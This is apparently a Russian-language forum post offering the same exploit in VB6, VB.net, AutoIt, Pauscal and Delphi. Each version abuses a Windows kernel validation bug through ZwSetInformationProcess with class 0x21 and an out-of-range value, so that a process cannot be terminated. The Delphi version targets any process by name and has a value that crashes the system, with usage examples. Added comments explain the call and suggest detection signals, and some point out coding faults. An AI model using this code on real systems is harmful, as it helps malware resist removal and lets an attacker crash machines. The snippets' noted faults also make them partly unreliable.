Неубиваемый процесс [VB6, VB.net, AutoIt, Delphi, Pauscal]
VB6 :
Код:
'Pink/Danyfirex
'All Credits http://waleedassar.blogspot.com/2013...opriority.html
'
' What this does: when the form loads, the process calls the native
' ZwSetInformationProcess on its own pseudo-handle with information class &H21
' (labelled ProcessIoPriority in the AutoIt version on this page), passing a
' pointer to the 4-byte value &H8000F129 and a length of 4.
' The thread title and the credited write-up describe the effect as a process
' that cannot be terminated. That depends on a kernel-side validation bug, so
' the affected Windows builds must be confirmed against the write-up.
' Defender note: documented I/O priority hints are a small enumeration
' (IoPriorityVeryLow..IoPriorityCritical). A set-information call for this class
' with a value this far out of range is an anomaly worth alerting on.

' Returns the pseudo-handle for the calling process.
Private Declare Function GetCurrentProcess Lib "kernel32.dll" () As Long
' Native API import: p1 = process handle, p2 = information class,
' p3 = pointer to the input buffer, p4 = buffer length in bytes.
Private Declare Function ZwSetInformationProcess Lib "ntdll.dll" (ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Private Sub Form_Load()
' The returned status is discarded, so a rejected call is not visible to the program.
ZwSetInformationProcess GetCurrentProcess(), &H21&, VarPtr(&H8000F129), &H4&
End Sub
VB.net:
Код:
'By Rottweiler
Imports System.Runtime.InteropServices
' ProtectMe wraps a single native call: ZwSetInformationProcess on the current
' process with information class &H21 (labelled ProcessIoPriority in the AutoIt
' version on this page) and the 4-byte value &H8000F129.
' The thread title and the credited write-up describe the effect as a process
' that cannot be terminated. That depends on a kernel-side validation bug, so
' the affected Windows builds must be confirmed against the write-up.
' Defender note: a managed binary that P/Invokes ntdll!ZwSetInformationProcess
' and passes an I/O priority value outside the documented enumeration
' (IoPriorityVeryLow..IoPriorityCritical) is a strong triage signal.
Public Class ProtectMe
#Region "VarPtr Support by Francesco Balena & Code Architects"
' -----------------------------------------------------------
' VARPTR implementation in VB.NET
' Part of VB Migration Partner’s support library
'
' Copyright © 2009, Francesco Balena & Code Architects
' -----------------------------------------------------------
' How the helper works: CallWindowProcA is declared with the variable passed
' ByRef in the second position, and the delegate below is supplied as the
' "window procedure". The callback therefore receives the variable's address
' as its first argument and simply returns it.
' NOTE(review): addresses are carried in Integer here, which presumably limits
' this to 32-bit processes - confirm before relying on it.
Private Delegate Function VarPtrCallbackDelegate(ByVal address As Integer, ByVal unused1 As Integer, ByVal unused2 As Integer, ByVal unused3 As Integer) As Integer
' Overload taking a Short by reference.
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal wndProc As VarPtrCallbackDelegate, ByRef var As Short, _
ByVal unused1 As Integer, ByVal unused2 As Integer, _
ByVal unused3 As Integer) As Integer
' Overload taking an Integer by reference.
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal wndProc As VarPtrCallbackDelegate, ByRef var As Integer, _
ByVal unused1 As Integer, ByVal unused2 As Integer, _
ByVal unused3 As Integer) As Integer
' Callback invoked through CallWindowProcA; echoes back its first argument.
Private Shared Function VarPtrCallback(ByVal address As Integer, ByVal unused1 As Integer, ByVal unused2 As Integer, ByVal unused3 As Integer) As Integer
Return address
End Function
' Returns the address of a Short passed by reference.
Private Shared Function VarPtr(ByRef var As Short) As Integer
Return CallWindowProc(AddressOf VarPtrCallback, var, 0, 0, 0)
End Function
' Returns the address of an Integer passed by reference.
Private Shared Function VarPtr(ByRef var As Integer) As Integer
Return CallWindowProc(AddressOf VarPtrCallback, var, 0, 0, 0)
End Function
#End Region
' Returns the pseudo-handle for the calling process.
<DllImport("Kernel32.dll")>
Private Shared Function GetCurrentProcess() As IntPtr
End Function
' Native API import: _1 = process handle, _2 = information class,
' _3 = pointer to the input buffer, _4 = buffer length in bytes.
<DllImport("ntdll.dll")>
Private Shared Function ZwSetInformationProcess(ByVal _1 As IntPtr, ByVal _2 As IntPtr, ByVal _3 As IntPtr, ByVal _4 As IntPtr) As IntPtr
End Function
' Issues the call on the current process. The returned status is discarded,
' so a rejected call is not visible to the caller.
Public Shared Sub Protect()
ZwSetInformationProcess(GetCurrentProcess(), &H21&, VarPtr(&H8000F129), &H4&)
End Sub
End Class
AutoIt:
Код:
; Author Delphi : Metal_Kingdom
; Credits : waleedassar
; Reference : http://waleedassar.blogspot.com/2013...opriority.html
; Usage : sNonKillableProcess()
; Enjoy
; ========================================================================================
; sNonKillableProcess: calls ntdll!ZwSetInformationProcess on the current
; process with information class 0x21 (named $ProcessIoPriority below) and a
; 4-byte buffer holding 0x8000F129. Takes no parameters and returns nothing
; explicitly; the DllCall result is stored in $sRet and not checked.
; The thread title and the credited write-up describe the effect as a process
; that cannot be terminated. That depends on a kernel-side validation bug, so
; the affected Windows builds must be confirmed against the write-up.
; Defender note: documented I/O priority hints are a small enumeration
; (IoPriorityVeryLow..IoPriorityCritical). A call for this class with a value
; this far out of range is an anomaly worth alerting on.
Func sNonKillableProcess()
Local $sProcessHandle , $sSignedvalue , $ProcessIoPriority , $sProcessInformationLength , $sStruct
; Exits the whole script when it is not running as a compiled executable.
If Not @Compiled Then Exit
; DllCall returns an array; element [0] is the pseudo-handle used below.
$sProcessHandle = DllCall("kernel32.dll", "handle", "GetCurrentProcess")
$sSignedvalue = 0x8000F129 ;0xFFFFFFFF (BSOD not work on Win7 x86 )
$ProcessIoPriority = 0x21
$sProcessInformationLength = 0x4
; 4-byte buffer that carries the out-of-range value to the native call.
$sStruct = DLLStructCreate("Byte[4]")
DllStructSetData($sStruct, 1, $sSignedvalue)
; Arguments: process handle, information class, buffer pointer, buffer length.
; NOTE(review): $sRet is not listed in the Local declaration above.
$sRet = DllCall ("ntdll.dll" , "none" , "ZwSetInformationProcess" , "int" , $sProcessHandle[0] , "int" , _
$ProcessIoPriority , "int" , DllStructGetPtr($sStruct) , "int" , $sProcessInformationLength)
EndFunc
Pauscal:
Код:
' Script summary: imports two native functions, calls ZwSetInformationProcess
' on the current process with information class &21 and the value &8000F129,
' then loops forever so the process stays alive.
' The thread title and the credited write-up describe the effect as a process
' that cannot be terminated. That depends on a kernel-side validation bug, so
' the affected Windows builds must be confirmed against the write-up.
' Defender note: documented I/O priority hints are a small enumeration
' (IoPriorityVeryLow..IoPriorityCritical). A call for this class with a value
' this far out of range is an anomaly worth alerting on.
Importar "Pauscal.prp"
' Returns the pseudo-handle for the calling process.
Proc GetCurrentProcess():Entero, "Kernel32.dll"
' Native API import: p1 = process handle, p2 = information class,
' p3 = pointer to the input buffer, p4 = buffer length.
Proc ZwSetInformationProcess(p1,p2,p3,p4:EnteroSig):Entero, "ntdll.dll"
Var Val:EnteroSig
Val = &8000F129 ' &FFFFFFFF ' BSOD
' Val@ passes the address of Val; Long(Val) presumably yields its size in bytes - TODO confirm.
ZwSetInformationProcess(GetCurrentProcess(),&21,Val@,Long(Val))
' Endless loop with a pause on each pass (Pausar(1000), presumably milliseconds).
Repetir
Pausar(1000)
PorSiempre
Delphi:
Код:
//All Credits: http://waleedassar.blogspot.com/2013/02/kernel-bug-1-processiopriority.html
//Metal_Kingdom | UdTools.net
// Native API import from ntdll.dll: cs1 = process handle, cs2 = information
// class, cs3 = pointer to the input buffer, cs4 = buffer length in bytes.
// Returns the status value produced by the call.
function ZwSetInformationProcess(cs1:THandle; cs2:ULONG; cs3:Pointer; cs4:ULONG):ULONG; stdcall; external 'ntdll.dll';
// Non_Killable: finds a running process by executable name and calls
// ZwSetInformationProcess on it with information class $21 (labelled
// ProcessIoPriority in the AutoIt version on this page).
//   Process - executable name compared with = against each snapshot entry.
//   BSOD    - True selects $FFFFFFFF, False selects $8000F129 as the value.
//   Result  - the status returned by ZwSetInformationProcess.
// Unlike the other snippets on this page, this one acts on another process,
// opened with PROCESS_ALL_ACCESS and an inheritable handle.
// The thread title and the credited write-up describe the effect as an
// unkillable process, or a system crash with the second value. That depends
// on a kernel-side validation bug, so the affected Windows builds must be
// confirmed against the write-up.
// Defender note: a process snapshot walk followed by OpenProcess with full
// access on an unrelated process, then a set-information call whose I/O
// priority value lies outside the documented enumeration
// (IoPriorityVeryLow..IoPriorityCritical), is a sequence worth alerting on.
function Non_Killable(Process: String; BSOD: Bool): ULONG;
var
Val : ULONG;
ProcessEntry : TProcessEntry32;
hSnapshot : THandle;
ProcessHandle : THandle;
ProcessID : DWORD;
begin
// Choose the out-of-range value passed to the native call.
case BSOD of
True : Val := $FFFFFFFF;
False : Val := $8000F129;
end;
// Snapshot of all running processes.
hSnapshot := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
// NOTE(review): ProcessEntry32 is not declared in this listing; the local is ProcessEntry.
ProcessEntry.dwSize := SizeOf(ProcessEntry32);
// Walk the snapshot looking for an entry whose executable name matches.
while Process32Next(hSnapshot, ProcessEntry) do
begin
if Process = ProcessEntry.szExeFile then
begin
ProcessID := ProcessEntry.th32ProcessID;
// Full-access, inheritable handle to the matched process.
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, True, ProcessID);
// The snapshot handle is closed here, inside the loop; the loop itself is not exited.
CloseHandle(hSnapshot);
end;
end;
// ProcessHandle is only assigned when a match was found; it is not closed in this function.
Result := ZwSetInformationProcess(ProcessHandle, $21, @Val, SizeOf(Val));
end;
Код:
// Usage examples from the post: the second argument selects which of the two
// values Non_Killable passes to the native call.
non_killable('Project1.exe', False); // without BSOD
/
non_killable('Project1.exe', True); // with BSOD
Убить процесс поможет программка
(c)level-23.cc